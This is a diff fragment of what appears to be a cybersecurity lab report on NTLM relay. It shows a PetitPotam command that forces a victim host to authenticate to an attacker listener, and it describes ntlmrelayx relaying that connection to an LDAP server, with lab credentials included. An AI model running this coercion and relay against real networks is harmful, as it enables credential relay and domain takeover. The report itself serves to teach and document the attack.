GasPROt/reportcybersec/report.md

 ```
 python3 PetitPotam.py -u victim -d ntlmlab.local -p Qwerty123 attacker@80/aaa 10.0.0.2
 ```
 Please see the attached screenshot with two terminal windows side-by-side:
-- on the right you see the PetitPotam execution, where the victim is forced to authenticate with the attacker-controlled resource;
+- on the right you see the PetitPotam execution, where the victim is forced to authenticate with the attacker-controlled resource over HTTP;
 - on the left the ntlmrelayx session where you see the incoming connection from the victim 10.0.0.2 which is then controlled (relayed) to the LDAP server 10.0.0.100.

 ![petitpotam](images/petitpotam.png)